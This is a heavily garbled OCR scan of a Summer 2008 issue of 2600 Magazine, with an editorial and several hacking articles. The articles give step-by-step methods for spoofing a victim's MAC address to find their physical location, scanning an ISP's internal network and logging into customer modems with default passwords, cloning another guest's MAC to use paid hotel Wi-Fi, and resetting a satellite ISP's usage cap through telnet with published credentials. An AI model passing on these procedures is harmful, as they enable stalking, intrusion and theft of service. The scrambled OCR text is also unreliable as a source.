2600 v25 n2 (summer 2008)

Toe
The Best of Times
Don't "Locate Me"
Exploring Road Runner's Internal Network
Hacking Wireless Networks with Windows
The HughesNet FAP
TELECOM INFORMER
Hacking Society
Thirteen Years of Starting a Hacker Scene
HPing (The Part I Forgot)
Meditation for Hackers: All-Point Techniques
Fun with Network Friends
Hacking: A Graffiti Writer's Perspective
HACKER PERSPECTIVE: Barry Wels
A Portable Encrypted Linux System for Windows
Mac Address Changer
Capturing Botnet Malware Using a Honeypot
LETTERS
Cracking with the Webtionary
JavaScript Password DOMination
Spirits 2000 Insecurity
TRANSMISSIONS
The Geek Squad
Bank of America Website Flaw
Why is This Computer Connected to the Internet?
Story: Message of the Day
MARKETPLACE
MEETINGS
6
8
10
12
13
15
17
20
22
24
25
26
29
30
31
34
48
49
52
54
55
56
58
62
66

History is something that we're always a load of trouble for their efforts. But there
living but ra rely appreciating. This year, al l was stil l this link to the past, where main
of that changed for us. We got the incred- frames dominated and phone phrea ks lived
ibl e opportunity to tru l y acknowl edge the in fear of arousing the ire of Ma Bel l.
significance of the changing trends and The 1990s was a period of growth
technol ogies that we have been witnessing where both telecomm unications and the
since 1984. And now we're ready to share concept of the Internet soared into the
what came out of it al l. stratosphere. Suddenly, everyone seemed
We're happy to announce the publica- to be fol l owing this stuff and the hacker
tion of our first-ever book: The Best of2600: world felt the effects in both good and bad
A Hacker Odyssey. When we were first ways. Having more peop le getting involved
approached with the idea for this project, was certainly nice. But al l of the attention
it seemed a daunting task. And it was. was a royal pain in the ass. Hackers had
After al l, how cou ld we possibly pick and always been looked upon with suspicion
choose from 24 years of publishing? And and paranoia but now it had graduated to
how would such a col lection be ordered? genuine fear and the desire to put certa in
The al most infinite amount of themes and offenders behind bars. We saw that happen
subject matter we've gone through in so too many times. The dot-com boom turned
many issues made this seem like something many of our friends into very rich people
we cou ld never pu l l off. a nd that tended to put all sorts of values on
So our biggest cha l lenge was getting a collision cou rse. And of cou rse, this was
this massive amount of a rticles into some the decade that the media really j u m ped
sort of order. After much brainstormi ng, we into the fray. There were books a nd movies
found the answer to be stari ng us i n the about hackers galore. Aga in, a bit of fun
face the whole ti me. What we've witnessed and a bit of a pa i n.
throughout all of our pages spans th ree very Then came 2000 a nd beyond. The world
disti nct decades: the 1980s, the 1990s, and in this period seems to have gotten so much
the post 2000 period. And that is how we more serious. Everyone appears obsessed
decided to divide the book. By decade. I n with security a n d convi nced that everyone
so doi ng we qu ickly discovered that there else is out to get them i n one way or a nother,
was a very noticeable change of mood and whether it be by stealing their identity or
tone when looki ng at such periods as cohe- blowing them to sm ithereens. The net has
sive u n its and then comparing them to each become a fixtu re in our daily routines,
other. speed and storage j ust keep i ncreasi ng
For example, the 1980s was filled with on a conti n ual basis, and comm u n icati ng
a sense of wonder as so many new thi ngs has never been easier. But somehow, the
were starting to come i nto play. The Bell i nnocence of our past seems to have been
System was bei ng torn apart. Computers d i m i n ished. To many, the simple roma nce
were beco m i ng more and more popular of playi ng with new technological toys is
and being fou nd i ncreasingly i n the home. noticeably lacki ng and technology has
Hackers were among the fi rst to figure it all become more of an assumed fact of our
out, finding ways of shaping the technology everyday lives. It's actually become easier
to the i r needs, and, naturally, getting i nto for many of us to stay con nected than to try
Page 4 -------------------- 2600 Magazine

a nd disconnect.
in each of these disti nct periods, we
fou nd there to be one remaining constant.
The hacker cultu re has remai ned true to
its bel iefs a nd l a rgely u naffected by the
changing world a round us. if you look at
one of our articles from our early days and
compare it to someth i ng from this issue,
you' l l notice that, whiIe the technology
is completely different, the sp i rit behind
the writing has mor e or less rema i ned
the same. it's always about aski ng ques
tions, perform ing a l l sorts of experi ments,
theorizi ng, and, above a l l else, sha ring thp
resu lts with the rest of us. Throughout al l
of the change and tu rmoil, this much has
fema ined.
Oncp we rpalized that wp had these
three u n ique decades and a com mon
thread' that ran between them, it was j ust
a matter of picking the stories that bpst
sum med up what was going on at the timp.
;s it tu rned out, this was another d,lunting
task. There were just so many fascinating
pieces that have gone into our pages ovl'r
the yea rs that it became pa infu l to decide
wh ich ones wou ld be incl uded and which
wou ld have to be left out. And even after
we had done a whole lot of cutting and
trimm ing, it was al l too clear that WP just
had an CJveralJllnci,mcp of m,lteri,ll. Trying
to fit it into a 360 page book wou Id be
next to impossible. in fact, just the 19BOs
cou ld have easily fil l ed the entire page
a1I0cation if we had let it.
Fortunately, our publishers had the
good sense to lubby for a dramatic
i ncrease in size for the book clnd we
found ourselves with a l i mit that was over
600 pages instead. As the months went
on, this wou nd up bei ng i ncreased once
more to nearly 900 pages! Appa rently,
the pub l i shers had j ust as difficu lt a time
figuring out what to cut as we did. What
better endorsement cou ld we possible ask
for?
article i n our very fi rst issue ended with the
sentence: "Tu rn the page and become a
part of our u nique world.")
We wa nt to tha n k the many readers who
have been suggesting something like this for
yea rs. We do listen to these suggestions ane!
we're happy that the opportunity presented
itself where we cou ld actua l ly bring these
ideas to fru ition. We also want to tha n k
Wiley rJuhl ishing ane! the many ppople
over there who have worked with us on this
project since it began last year. We now
h.Jve something which e1l1 make .1 good
dedi of our material .1 lot more accessible,
not oniy to our existing readers hut to �1
vast nu mber of others who have never pven
he.ml of 26()(} ,1I1el whose only [wneption
of what hackl'rs are ahout comes from thp
mass medi'l. This is ,1 tremendous opportu
nity to h.l/p our voices hc,lrd in �1 whole
new .Hen'l ,mel to open somp doors in what
others onIy spe as walis.
And for lTlany of us, this wil l ill' .111
.1Il1.1Zing trip dO�n Memor y L.Ull'. We tend
to forgpt aII of the ITldgic of thp past and tile
significancc' of thl' differences in the WolY
things used to work, both big things ,mel
littll' things. An prol wlwn sonwtiling like
Cal ler If) WilS seell as extreillely contro
versial, when packet switched ndworks
were a l l the rage, when [Xlgers we're far
more prevalent than cel l u lar phones, when
scnriing electronic maiI between different
computer systems W.1S a rea l l y big dea l. it's
one thing to simply remember those days,
quite another to immerse you rself in the
words and emotions of the time period.
What's most amazing to us is how relevant
it al l is, even when the tech nology is al most
u n recognizable. ;nd for those of you who
weren't even a l ive back then, there is no
better way to get a true sense of the h istory
that we a l l know is out there somewhere.
ThE' Best of 2600 wi l l officia l l y be
released at The Last HOPE conference
and wi l l be ava i l able thereafter a l l over
the world. We doubt there wi l l ever be a
book with this m uch i nformation about
the hacker world crammed i nto so many
pages. But we certainly do hope to see a lot
more hacker-re l ated books a nd a n overa l l
i ncrease i n the i nterest level stemm i ng from
a l l of th is. Beca use one th i ng we learned
from goi ng through every a rticle we ever
pri nted, apart from bei ng utterly captivated
by some of the stories, is that th is stuff rea l ly
does matter.
in the end, we wou nd up with a pretty
neat col lection of some of what's been
goi ng on in the hacker world in the last
quarter century. Wh iIe it's titled ThE' Best
of 2600, there a re sti l l lots of good pieces
that didn't make it in for one reason or
a nother. But we bel ieve that if you look at
a l l of the pieces that are i ncl uded, you' l l
get a pretty good sense of what's been
happen i ng in our u n ique world si nce our
fi rst issue i n 1984. (in fact, the very fi rst
Summer 2008 -------------------- Page 5

nit
'Locate Me'
by Terry Stenvold
thebmxr@gmail.com
Disclaimer
Th is article is for educational pu rposes
only. Check local laws before attempting
a nyth ing. The author holds no responsibility
for the use or m i suse of th is information.
General Information
As you may know, there is a new feature
included inthe GoogleMaps 1.1.3 updatefor
theApple iPhone and iPodTouch: the "Locate
Me" featu re. The new feature is provided by
another company called Skyhook Wi reless
(http://www.skyhookwireles .com/).
Skyhook's system is named WPS, for Wi re
less Position i ng System, and locates users
by knowing the location of thei r wi re
less aperforms thei r location featu res in a
u n ique way because WPS requ i res knowl
edge of the specific geograph ical location
of i ndividn and locate access poi nts, and
they then append th is i nformation to a large
reference database. The problem with the
system, other than know i ng someone has
driven by you r house or busi ness and added
your AP ' s i nformation to a large database, is
that a th i rd party can then locate you with
only you r MAC address. I recently emailed
Skyhook and asked if there is a way for
people to lotabase besides unpluggi ng the
access poi nt.
Th is article will provide evidence contra
dicti ng both answers provided by Skyhook.
It will also expla i n how someone with mali
cious i ntent could possi bly discover you r
location.
mode; an iPhone, iPod Touch, or any other
mobile device with the "locate me" featu re;
the MAC address of your victi m; and an
isolated area where no access points have
been located and added to Skyhook' s refer
ence database.
Scripts
There are two scri pts i n this system.
skyhack . sh will create a bridge between
the ethernet and wi reless card to create
an AP envi ronment. You can also use two
wi reless cards, but the AP broadcasting
must be unmarked by Skyhook, wh ich
would require editing the scri pts. delbrO .
sh destroys the bridge, wh ich returns you r
computer t o normal.
Step 1: Gaining the
MAC address of a victim
The process of acqu i ri ng a MAC address
is beyond the scope of th is article, but I will
Requirements provide some general ideas as to how to do
To run these scripts, you 'll need a it. Wi reless router packagi ng often displays
L i n ux computer with an ethernet connec- the MAC address on the outside of the box,
tion and a wi reless card capable of master so sales personnel at an electron ics store
Page 6 -------------------- 2600 Magazine

could easily write down the MAC address
and keep that information unt i l the product i s
sold. This i s fairly useless, because the MAC
address Glil be cloned during the setup of
a wireless router, wh ich wou ld then change
the address, rendering the original infor
mation obsolete. Another way to acquire a
MAC address is via social engineering. This
is accomplished by conning an individual
into divulging their MAC address. Google
is another sou rce that can be used to obtain
MAC addresses. Some people post their
MAC addresses wh ile seeking help in a
foru m to solve a problem. Gaining access
to a computer through a Trojan horse and
running the command "arp -a"
Step 2: Setting up your computer
The basic idea is to make you r computer
into an AP that spoofs the victim's MAC
address. The way we do this is to bridge the
ethernet cable and wi reless card. The wire
less card will then act as the access point
of the spoofed victim. To run the bridging
scri pt, run this com mand from the console:
. /skyhack . sh 00:00:00:00:00:00.
You need to change the MAC address to
the twelve-character MAC address of the
victi m. Your connection will then bridged,
and the router's DHCP server wiII hand out
an IP address to your mobile device when
connected.
Step 3: Finding the
approximate location
When you go to you r mobile device, you
should see the SSID "skyhack." Con nect to
this "skyhack" network. To ensure that you r
connection is worki ng properly, check that
your IP address is not in the 169.254.0.0
address block. You r web browser should
then be used to load a website to guarantee
that you are receiving internet traffic. If
this works, you are now ready to connect
to Google Maps and use the "locate me"
feature. Make certai n there are no other
AP 's around; if there are, be sure that they
are not in Skyhook's database, as they can
affect your results. By using the "locate me"
featu re, you should now be able to see
the victi m's approximate location with i n a
100m-2 00m diameter.
Step 4: Locating victims'
exact locations
Use Google Maps to give you driving
di rections to the approxi mate location
given. To return your computer to normal,
run . IdclhrO. coh. This removes the bridge
belween your elhernel and you r wi reless
card. It also returns your wireless card to
managed or ddault mode. Now, drive to the
approxi mate location, and scan the local
area with your laptop or mobi le device for
the specific MAC address in question until
the location is pinpointed.
Prevention
To prevent these types of secu rity
breaches, keep your software patches up-to
date and use vi rus and malware scanners to
prevent intrusion by others who may then
acqu i re the MAC address of you r router.
Also be wary of technical helpers over
the phone or over the Internet who ask for
your MAC address. A more definite way to
prevent intrusion is to use the "Clone MAC'
feature that can be found on most router
configuration pages. This is pri marily used
to prevent the ISP from blocking internet
access to you r newly acqu i red hardware,
making it so that only you r PC can access
the internet. This tool can also be used to
change the MAC address so that it will point
intruders to nowhere or will point them to
someplace completely different. Always
check that the newly changed MAC address
is not sim ilar to a neighbor's. With Skyhook
claim ing that it is not possible to remove
single AP 's from thei r database, this is the
best method, as long as you change the
MAC often .
This method o f locati ng has been tested
with access points around my local area and
also with a friend who lives almost 8000 km
away. Please note that this "attack" is only
as accurate as Skyhook's database.
As a side note, these types of attacks
could be used to tell friends your home
address. Instead of telling them that the
address is "2 600 Robert Street," you could
say, "I am living at 00:00:00:00:00:00."
Notes
The scripts provided in th is article will
not work out of the box with any wi reless
card or ethernet adapter unless the interfaces
are named athO, wifiO, and ethO. In most
other cases, a simple change from athO to
ethl or wlanO is all that is needed. Using
different routers will also requ i re different
IP ranges. For example, Dli nk routers would
use 192 . 168.0.5 instead of 192 . 168. 1.5.
Summer 2008 -------------------- Page 7

by Tim The cable m is essentially doing very
simple routing for your computer. It is simply
Most ISP s require you to have a modem taking everything given to it and pushing it
of some sort. For broadband cable, this is through the other side in accordance with
usuallv a DOCSIS (Data Over Cable Service the ISP's settings. This is how it was intended
Interf;ce Specifications) compatible device, to be. Th£' cabl£' company can terminate your
version 1.0, 1.1, 2.0, or 3.0, depending on connection by sending a series of commands
your ISP's needs. This device is essential to the device. It can similarly throttle your
to cable intern!'t as it isolates and uses the connection, do troubleshooting, and so on.
various frequencies on the cable line which They do this either by using proprietary tools
have been reserved for internet service. All such as Orion, which has some phenom-
of this information is determined by your ISP enal CMTS tools, or by using in-house tools,
and is delivered to the cable modem via tftp usually PHP, ASP, or Perl scripts running on
from some server on your ISP's non-public some machine that manages the network.
network. Your cable modem has a MAC (See the resources at the end of this article
address like any other network device, and for some interesting sites on the Road Runner
it is usually this that the ISP uses to authen- network). From there, they ran do all sorts of
ticate you to the network. The CMTS (Cable stuff, but the important thing to remember is
Modem Termination System) is where the that they are not using your public IP address
transition between cable and fiber happens, to do this; they are using the private IP
for those that are interested. At any rate, once address given to your modem. This is where
your device is determined to be legitimate- m)' story begins.
again, the method is determined by the ISP, I was sitting in my office, configuring my
but is most likely the MAC address-you are router to support the addition of a couple
leased a public IP address. There is also an more subnets in the 10.0.0.0/24 range. As I
internal IP address granted to the modem, was doing this, I decided that the easiest way
and it usually resides somewhere in the 10.x to test for connectivity among the various
private subnet. This address should never be subnets was to simply allow all traffic on the
accessible either from your own computer 10.0.0.018 network to pass to any of the other
or by anyone else that isn't correctly authen- subnets. So, I set all this up and let some
ticated on the network. This is to prevent ICMP traffic fly across the wires. This is where
various horrible things from happening, such it got interesting.
as the use of one of the many in-band config- I typed an IP address incorrectly. To be
uration methods for routers and switches that specific, I typed 10.0.0.10 and pressed enter.
reside on the networks. Most devices decide Knowing that this I P address would not be
who should be able to access the device found on my network I went to Ctrl+C the
remotely only by seeing which network command. What did I see appear on my
they reside on. If you access the 10.x side console? "Reply from 10.0.0.10: bytes=32
of the device, the odds are good that you'll time=76ms TTL=128." My first thought was
be allowed access at least at the same level that someone had penetrated my network
as the I S P. Simple enough. Now, once your and established an entire subnet without me
device is given the correct network configu- noticing. Then I saw the latency and decided
ration, it then forwards those settings onto to do a traceroute. Sure enough, the trace
your computer. If you are not using a router passed through my router, through the ISP
or some middle-man appliance, then your provided modem, and over the Road Runner
computer will inherit the TCP/I P configura- network, eventually coming to a stop at some
tion, allowing you to access the internet at poor soul's Ambit Cable Modem.
large. Admittedly, I was very curious, so I ran
Page 8 -------------------- 2600 Magazine

some simple n map commands and d iscov- me. There don 't seem to be any restrictive
ered that th is device was l i sten ing on port 80. measures i n place or a nyth i ng, B i l l . As for
So, I loaded fi refox and hit the device with how th i s has been happen i ng, I ' m not sure."
HTTP. Sure enough, I saw the cable modem's "Okay, do you see any other private I P
management screen . Bei ng the concernecl addresses, a nyth ing l i ke 192?"
citizen that I am, I tested the logi n to make " Doesn 't seem l i ke it, B i l l, but I have n ' t
sure t h e defau lts h a d been changed . Much rea l l y looked either."
to my su rprise, I cou l d log in and get fu l l "How are you seeing these I P
viewing and configuration access with user- addresses? Are you using a packet sniffer or
name and password "user." I then had admin someth i ng?"
access to someone's cable modem, complete At th is poi nt, I rea l ized that he was very
with an i nternal I P address range on Road concerned and that he was fish i n g for infor-
Ru nner's network, the publ ic I P address, the mation. I tol d the truth, as I don't want to go
MAC address, and everyth ing else neecled to j a i l for terrorism or some other equa l l y
to clone the i r cable modem and stea l their absurd reason. ( Hooray for abusive and
service. From the screen which came u p, you unconstitutional laws ! )
can resta rt the device, reset it t o t h e factory " I 'm j ust using nmap t o scan t h e subnet,
defau lts, or do pretty much a nyth ing you no packet sniffers or a nyth ing. So, yea h, I ' m
want. My mind boggles at the concept. And actu a l l y very concerned about this. If I can
this is j ust 10 addresses into a 16 mi l l ion host see these internal I P addresses, it means that
subnet. I immediately powered up nmap with I can sn iff traffic off the network as wel l, Bi l l .
O S fingerprinting and version scann ing with I don't l i ke that. If I found this by mista ke,
the ta rget network of 10.0.0.0/8. I watched someone out there wi l l certa i n l y fi nd it as
as the log file grew from 1k to 10k to lOOk to wel l . I mean, if I were ma l icious, I cou l d
1OOOk. After a couple o f hours, I h a d a 5MB ca use some serious damage. These devices
fi l e, fu l l of cable modems running HTTP, SSH, have default admin logi ns. Oh, and the guy
tel n et, and va rious other services, a l l of them at 10.0.0.10 is hav i ng network issues."
using defa u lt logi ns and passwords. Most of "Rea l ly?" H e chuckled nervously. "We l l ,
them are running vulnerable version o f SSH, hold on a m i n ute. I have to make a calL"
and a l l of them w i l l fa l l back to SSH1, which I wa ited on hold aga i n, this time for only
mea ns that any passwords that may be in a couple of min utes.
p l ace protecting the shel l access are useless. "Alright, the security specia l i sts say that
I suddenl y rea l ized that Road R u n ner th is is normal for the network. Si nce you 're a
m ight notice a l l of the scanning that I was part of the network, you shou l d be abl e to see
doi ng, so I cal led up Road R u n ner tech the other machi nes, so it's okay. You 're on a
support and asked to speak to someone i n the busi ness accou nt and, si nce you have a static
security department. They put me on hold, I P, you a re abl e to see some th i ngs that most
and I l istened to crappy music for about ten of our customers can not. I ' l l make some notes
m i n utes before someone fi n a l l y picked up. on your accou nt so that it's c lear that you
We w i l l cal l h i m B i l l . mentioned this to u s a n d were concerned.
"Hel lo, than k you for cal l i ng roadrun ner You m ight get a cal l from the Road Runner
tech nical support. My name is B i l l, how can security department some time i n the future.
I help you ?" I s there a nyth i ng else?"
" H i, B i l l . My name i s Ti m . I ' m j ust cal l i ng The conversation ended with the standard
to report some strange behavior on your scripted clos i ng, and I hung up the phone.
network. It seems that I a m able to see some of Normal operational behavior? An entire
your i nternal IP addresses. I can access your i nternal IP address range ava i l able publicly?
entire c l ass A subnet as if it were publ ic." I cou l d see not j ust a n entire subnet, but the
"Oh . . . hold on a m i n ute. I have to make entire 1O.x network, the entire Road Runner
a calL" network. I decide to test B i l l ' s theory about
I was then put on hold for about twenty the busi ness connection. I SSHed i nto my
m i n utes. Eventu a l l y B i l l returned, with an L i n ux box at home and issued a p i ng to
edge of concern in h i s voice. 10.0.0.10. Sure enough, it responded. So,
"Can you give me some more i nformation everyone on the Road Runner network can
about this? What addresses are you seei ng? si mply use th i s private IP range to access
What do you thi n k is a l l owing you to do network equ i p ment. I quickly l oaded up
this?" nmap and conti n ued the scan .
"We l l , a n y I P address on the Road Run ner A t th i s poi nt i n ti me, I had fou n d several
network that starts with lO is visible to thousand modems, nearly a l l of them ru n n i ng
Summer 2008 -------------------- Page 9

webservers, many of them a l so ru n n i ng SSH
and tel net. I a l so found several cable modems
acting as routers. If someone were to log i nto
one of those devices, it wou l d n ' t be hard to
set up forwards i nto the NATed network or
to forward a l l their traffic through a tunnel
to some other Pc. The possib i l ities then
wou l d be nearly l i m itless: h ijacking Vol P
service by clon i ng their hardware, steal i ng
i nternet service by clon i ng the MAC address,
changing setti ngs, or redirecting the location
of the defa u l t DOCSIS servers, among other
th i ngs.
As far as I SP-Ievel equ i pment goes, Road
Run ner ' s DHCP servers, D N S servers, and
network monitoring services are all ava i l able
for sca n n i ng. Worse, n map's version reporting
option (-sv) shows version n u mbers for the
services ru n n i ng. Many of these a re reported
correctly, and severa l of them are v u l n erabl e
t o very wel l -known expl oits. For i n stance,
on one particular server the SSH daemon is
set to rol l -back to SSH 1 if the c l ient doesn 't
support SSH2 . Aside from all of that, a q u ick
scan of the l og fi le reveal s the type of I DS
they 're usi ng, the type of network monitori ng
software they 're usi ng, strange and u n needed
th ird party app l i cations such as screencast,
and other pieces of i nformation, a l l freely
ava i l able. Honestly, I don 't i magine that it
wou l d take a ski l l ed hacker more tha n an
hour or two to successfu l l y compromise the
systems. The servers are pretty homogeneous,
apparently consisting mai n l y of L i n u x servers
ru n n i ng essentia l l y the same a pp l ications, so
the odds are good that if you can compro-
by Carbide
m i se one system, then you can take the rest as
wel l . Also, each system seems to be a centra l
I DS reporting center, most l i kely for whatever
section of the network it control s, and sysl og
i nformation is forwarded to those mach i nes.
The i nformation that cou l d be gleaned from
the l og fi l es alone wou l d be worth its weight
in gold.
Of the 25,000 or so devices that showed
up, about 100 of them seemed to be I S P
servers. I stopped sca n n i ng after about 12
h ours because I felt l i ke I had seen enough,
but a nyone who were to scan the entire 10. x
s ubnet wou l d undoubtedly d iscover m u c h
more t h a n I have.
N eed l ess to say, the potentia l for abuse
here is tremendous, and it's shocking that this
ki n d of network behavior was ever engineered
to beg i n with. U nder normal circu mstances,
their routers and firewal l s shou l d fi lter pub l ic
requests for private I Ps, but I guess th i s isn ' t
bei n g done.
I guess it's true what they say about corpo
rate networks: hard on the outside, gooey on
the i nside.
One fi nal note: There are i nteresting
sites at tools.location.rr.com, where loca
tion is your geographical region, usual l y
pretty easy t o figure out. For example, the
Tam pa, F l orida area is http://tools.
-tampabay. rr . com. The l ogi n and pass
word have recently changed, but these sites
conta i n a l l the information needed to h ijack
someone's account or to cha nge most, if not
a l l , of the services attached to the accou nt.
Pretty s l i ck stuff.
Open i n g u p Firefox took me to the page that
exp l a i ns the pricing a n d service. The hotel
First, the n ecessary disc l a imer: gai n i n g I was i n happened t o have o n l y u n l imited
u n authorized access to wire l ess n etworks, p l a ns, which I ' l l expl a i n l ater. My friend
especia l l y when someone wants you to pay, o nce tol d me that he had read i n 2600 a
is probabl y i l l ega l . This article is provi ded way to gai n access to wire l ess n etworks
for i nformation o n l y. by MAC address spoofi ng i n L i n ux. H e
I was recentl y o n a bus i n ess tri p, a n d basica l l y described that you fi nd other
I took the compa n y-provi ded W i ndows computers o n the w ireless n etwork, the n
l a ptop with me. The hotel I was stayi ng fi n d their MAC addresses, the n cha nge your
in had wi!y port w irel ess access1 for a fee. MAC address to match theirs. O nce this is
Page 10 ·------------------- 2600 Magazine

done, the w ireless router routes every other
packet to your computer. The way it was
described, the w ireless router t h i nks both
computers are o n e computer because they
h ave same hardware address.
Not h av i ng L i n ux w ith me at the time,
I made s ure I had two very important
programs: Kabood l e' a n d Tech n it i um M AC
address cha nger'. First, I con n ected to
the wireless access poi nt of i nterest a n d
opened u p Firefox t o ensure th at th e correct
page was d i s p l ayed. Second, I opened u p
Kabood l e a n d waited for every computer
on the n etwork to be scan ned. Th i s may
take a w h i l e if the n etwork is rea l l y busy.
Then, the computers were displ ayed; some
are shown a s comp uter n ames l ike NANCY,
others a s IP addresses. Doub l e cl ick i n g o n
o n e o f them s h ows t h e computer' s M AC
a ddress:
S""..."rIojVNC·_lkonPr.-..,..t,..j
""liIiRi-----
Conn.cI....lo ...'...k·J;__ ..noIA"';.."
The n ext step i s to change your M AC
address to the o n e that i s d i s p l ayed . There
are severa l ways to do t h i s i n W i n dows.
On e way that I'm fami l iar w ith i s to edit the
registry to change the address, but I prefer
the Techn iti um M AC address changer for
frequent changes. Open u p th i s program,
a n d change the M AC address to the o n e
that i s d i s p l ayed by Kabood l e:
The w ireless card shou l d be d isab l ed
a n d then re-e n ab l ed, a n d then it shou l d
recon n ect t o t h e n etwork o f i nterest.
Navigate to your h omepage a n d it
shou l d d i s p l ay. Some probl ems that might
be e ncou ntered are s l ow page l oa d times,
frequent d i scon n ects a n d recon n ects to
the access poi nt, a n d a complete i nabi l ity
to access the AP at a l l . I encou ntered s l ow
page load times. Th i s might be attrib
uted to both computers try i n g to access
a l ot of i nformati o n at one time or down
l oa d i ng or u p l oad i ng l arge a mou nts of
d ata. If t h i s h a ppens, changing to a d i fferent
M AC address might be u sefu l . The secon d
probl em might b e t h e router try i n g to
d efeat t h i s method, d etect i n g two identica l
M AC addresses, a n d n ot a l l ow i n g either to
Con_�"" W.oIe" NelO>Jork Com"�loon
().y",eN�roo . DeIIT,ueMobM115DS.,,,,,W.eI�oll<NfM.PC
rlaod"'OIelD pcmciaidelHruemabiio_l15(t"",iB,_pc_"""'-c1l41
Co""1UI�I",nID _ {b95321359-0020-47A1-1lC19-37940X39ECIJ
OC!-13·0H:7-5Hf{Ch""Qedl
InteICOIPOIolejI)J-13-021 Ad()e"lbl8J,"""
con n ect. The th ird probl em might be that
the router has d etected o n e MAC address
first a n d w i l l n ot a l l ow an identical o n e to
con n ect because it h a s a lready a ssociated.
Severa l mora l a n d eth ical probl ems
might be con s idered. For exampl e, if t h i s
i s n ot a n u n l imited p l a n , then each byte
might cost the customer m o n ey. Common
courtesy wou l d d ictate that you make s ure
you 're u s i n g an u n l imited p l a n . A l so, if the
u ser suspects that activity h a s been goi n g
o n w h e n they were n ot u s i n g t h e service, it
might rai se some questions. Another poten
tial probl em wou l d arise if th e customer gets
randomly kicked off; they might ca l l tech
n ica l s u pport to i nvestigate, w h ich cou l d
further compl icate matters. The l a st mora l
d i l emma i s charg i n g for w ireless access i n
the first p l ace, w h ich shou l d put people
at u n ease, but, surpr i s i n g l y, does n 't. One
probl em with this i s charg i n g for a s ubstan
d ard service when oth er services are ava i l
abl e that peo p l e wou l d h ave n o objection
to p ay i n g for, s uch a s eth ernet a n d fiber
optic con nections. The oth er probl em w ith
charg i n g i s that offering free w ireless access
attracts customers to w hatever service you
are offeri ng, w h ether it's stayi ng at a h otel or
getting a cup of coffee. I apologize for the
d i gression and for any d i sagreei n g l etters
that might fol l ow.
References
1 http://www . wayport . n et/
2 http://www.kaboodl e.org/
l http ://tmac . t ec hnitium . c o m/
-tmac/
Thanks: Droid for telling me about
this method and the author of the 2600
article about it.
Summer 2008 ------------------- Page 1 1

;'�he HughesNet FAP
by ntbnnt
I use satellite I nternet, which is great
for web browsi ng, I RC, 1M, e-mail, and
the like. B ut it offers absolutely no conve
nience whatsoever for downloading music,
listeni ng to i nternet radio, or downloading
my favorite Linux distro.
You see, H ughesNet has a particularly
restrictive Fai r Access Policy (FAP). Now, I
understand perfectly why a FAP is needed;
however, it seriously limits many of the
more obvious and useful applications of
h igh-bandwidth I nternet.
Having the hacker's perspective, I ques
tioned if it were possible to reset my I nternet
usage statistics, so that I 'd be able to take
the 2 .5 hou rs of non-stop HTTP commu
n ication that it takes to download an .iso
of Debian without having to wait 24 hours
after each hu ndred megabytes.
The equ ipment for a H ughesNet connec
tion is a satellite dish, its radio, and a receiver,
or modem if you will. The modem is a basic
VxWorks-based router with only one port
and the equ i pment and software to interpret
the satellite signal. You can telnet i nto this
router by connecting to 192.168.0.1:23
and entering the username brighton and
the password swordfish. Anyone with
experience hacki ng VxWorks equ ipment
should find a new toy instantly with that
i nformation. But, onward to the FAP issue.
There is a separate telnet daemon
ru nning on the HughesNet modem. It is
listening for the free-mi nded to call upon
its power at 192.168.0.1:1953, and
H ughes made it easy for us, si nce we can
access th is menu without any kind of login.
Basically, this is the CLI of what you get by
visiting http://192.168.0.1, but it
provides some much more useful fu nctions.
Entering? i nto the command prompt will
yield all the i nfo we will need.
The H ughesNet FAP is enforced by
tracking the bandwidth used by each Site ID.
If you 've never done so before, go to System
I nfo to see this.
Basically, it serves
as authentication
that you r modem
is commissioned
for service. If you
have no Site ID, access to the H ughesNet
network will not be granted. Now, basically
the goal is to reset all of the i nformation
stored about you at the H ughesNet NOC,
so your FAP status is reset back to n il. That
will allow you to fin ish the download of
Debian, RedHat, or whatever you prefer.
So, we will need the help of tech support.
Th is is fi ne, because tech support is you r
friend. Reconnect to you r router and enter
the command rd. Th is is goi ng to force you r
modem i nto a state of bei ng decommis
sioned, which will require it to be recom
missioned with the help of tech support. Go
ahead and call 1-866-347-3292 . G ive them
all the i nfo they need; be honest.
The agent will not check your FAP
status-it's simply not i n the script. He
will tell you to go to h t t p : //1 92.168.0.1/
-f s/reg i s t r a tion/ s c tup . h tml and click
"Re-Register."Conti nue through the prompts
u ntil the modem reboots. After it does so, let
it sit, watch the status at lot tp: / / 1 92.168.0.1,
and let it update. When it's done updati ng,
go ahead and check the FAP status. It should
now say "NO." That means sweet, unme
tered freedom. Sm ile and watch as your
connection goes from 2 .2 kb/s to 200.2 kb/s,
and sm ile bigger with that n ice fat down
load sitting i n you r download folder. Redo
this as needed, but remember to call tech
support every few ti mes that you need to do
it; that way H ughes will see that there are
issues with you r service and that you aren 't
decommissioni ng you r modem for fun.
Shouts to h3xis, who taught me about
firmware, showed me how to hack Tomato,
and introduced me to 2600.
Page 12 -------------------2600 Magazine

Hel lo, and greetings from the Centra l Office!
After an u n usua l ly cold and rainy winter here in
the Pacific Northwest, summer is in fu l l swing.
With so little good weather in this part of the
world, peop le head outdoors and make the most
of it - even with gasoline hovering near $5 per
ga l lon.
For many young people, this mea ns it' s time
for noisy outdoor concerts, which I ' m told are
even louder than our dic'sel backup generator
here at the Centra l Office. At a h uge music
festiva l with sound systems approaching the
decibel level of ;1 737 ta king off, how do you
find you r friends! I nc reasingly, text messages a re
the solution.
You may not thin k a bout it much when you ' re
sending "HEY CRACK DAWG W H ERE U (0)" to
you r friend, but sending and receiving sma l l kxt
messages is incredibly complex - in fact, m uch
more complicated than email. Ma king matters
worse, there a re m u ltiple versions of SMS, and
m u ltiple technologies involved in mobile phone
systems (for exa mple, CDMA IS-95, CDMA2000,
G SM CSD, and G SM G PRS). For this Mtic le, I ' l l
focus o n GSM networks, which are operated by
AT&T and T-Mobile (along with some smal ler
regiona l ca rriers such as Edge Wireless) in the
u.s.
Text messages a re governed by the Short
Message Service (SMS) sta ndard. This is cu rrently
defined as part of the European Telecomm u nica
tions Standards I nstitute (ETSI) GSM 03.38 sta n
dard. It incorporates, by reference, the MAP part
of the Signa ling System 7 (SS7) protocol . The
specification a l lows for 1 40 byte messages. I n
North America, this transl ates t o 1 GO characters
because the character set used is limited to 7-bit
ASC I I characters. In Unicode dlphabets (such as
Arabic, Chinese, or Cyril lic), where characters
a re two bytes apiece, SMS messages can only
be 70 characters in length . Whichever a l phabet
you use, larger messages are genera l l y split
apart to be delivered (and bil led) as m u ltiple
text messages. However, because additiona l
metadata is required to accomplish this, the size
of each message is reduced hy six hytes (seven
ASC I I characters).
To understa nd how ,10 SMS message is deliv
ered, it ' s importa nt to first u nderstand a little
about how GSM switching works. So, here ' s a
crash cou rse.
HlR
When you sign up for service, you r phone
